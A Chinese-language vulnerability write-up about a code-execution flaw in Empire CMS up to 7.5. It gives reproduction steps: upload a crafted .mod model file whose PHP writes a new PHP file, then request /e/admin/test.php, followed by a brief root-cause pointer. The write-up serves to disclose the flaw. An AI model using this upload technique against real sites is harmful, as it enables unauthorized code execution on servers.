帝国cms7.5后台导入系统模型处存在代码执行漏洞
在后台导入系统模型时,未做验证,导致上传的文件内容会被执行。
漏洞简介:
在后台导入系统模型时,未做验证,导致上传的文件内容会被执行。漏洞影响版本:
Empire CMS <= V7.51、点击系统---数据表与系统模型---管理数据包---导入系统模型
2、新建一个test.php.mod文件,内容为
<?php
file_put_contents("test.php","<?php phpinfo(); ?>");
?>
然后上传在模型文件(只有显示“导入模型成功”才实现了文件的导入):
3、访问URL:/e/admin/test.php即可实现命令的执行
4、服务器端查看上传的文件内容
漏洞原理分析
1、\e\admin\ecmsmod.php导入模型
2、跟随LoadInMod函数来到\e\class\moddofun.php
免责/版权声明:
1、所有来源标注为 ECMSPLUS /zwcms.com的内容版权均为本站所有,若您需要引用、转载,只需要注明来源及原文链接即可,如涉及大面积转载,请来信告知,获取授权。
2、本站所提供的文章资讯、软件资源、素材源码等内容均为作者提供、网友推荐、互联网整理而来(部分报媒/平媒内容转载自网络合作媒体),仅供学习参考,如有侵犯您的版权,请联系我们,本站将在三个工作日内改正。
3、若您的网站或机构从本站获取的一切资源进行商业使用,除来源为本站的资料需与本站协商外,其他资源请自行联系版权所有人。
4、 ECMSPLUS /zwcms.com不保证资源的准确性、安全性和完整性,请您在阅读、下载及使用过程中自行确认,本站亦不承担上述资源对您或您的网站造成的任何形式的损失或伤害
5、未经 ECMSPLUS /zwcms.com允许,不得盗链、盗用本站资源;不得复制或仿造本网站,不得在非 ECMSPLUS /zwcms.com所属的服务器上建立镜像, ECMSPLUS /zwcms.com对其自行开发的或和他人共同开发的所有内容、技术手段和服务拥有全部知识产权,任何人不得侵害或破坏,也不得擅自使用。
6、互联网的本质是自由与分享,我们真诚的希望,每一份有价值的正能量能够在互联网中自由传播,能够为每一个网站提供动力。
评论(3)
欢迎您光临1pma.cn,本站秉承服务宗旨 履行“站长”责任,销售只是起点 服务永无止境!
?
?普通用户